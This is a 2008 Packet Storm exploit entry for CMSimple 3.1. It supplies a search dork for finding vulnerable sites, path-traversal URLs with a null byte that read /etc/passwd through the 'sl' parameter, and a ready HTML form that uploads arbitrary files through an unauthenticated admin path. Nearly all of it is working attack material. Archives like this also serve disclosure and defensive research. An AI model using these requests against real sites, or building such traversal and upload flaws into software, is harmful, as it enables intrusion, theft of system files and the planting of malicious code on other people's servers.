cmsimple-lfiup.txt

2008-05-31T00:00:00
ID PACKETSTORM:66857
Type packetstorm
Reporter irk4z
Modified 2008-05-31T00:00:00

Description

                                        
                                            `<pre>  
#  
# CMSimple 3.1 Local File Inclusion / Arbitrary File Upload  
# download: http://www.cmsimple.org/?Downloads  
# dork: "Powered by CMSimple"  
#  
# author: irk4z@yahoo.pl  
# homepage: http://irk4z.wordpress.com  
#  
  
  
Local File Inclusion :  
  
http://[host]/[path]/index.php?sl=[file]%00  
http://[host]/[path]/index.php?sl=../../../../../../../etc/passwd%00  
  
  
Arbitrary File Upload (into http://[host]/[path]/downloads/ ):  
</pre>  
<form method="POST" enctype="multipart/form-data" action="http://[host]/[path]/index.php?sl=../adm&adm=1" >  
<input type="file" class="file" name="downloads" size="30">  
<input type="hidden" name="action" value="upload">  
<input type="hidden" name="function" value="downloads">  
<input type="submit" class="submit" value="Upload">  
</form>  
`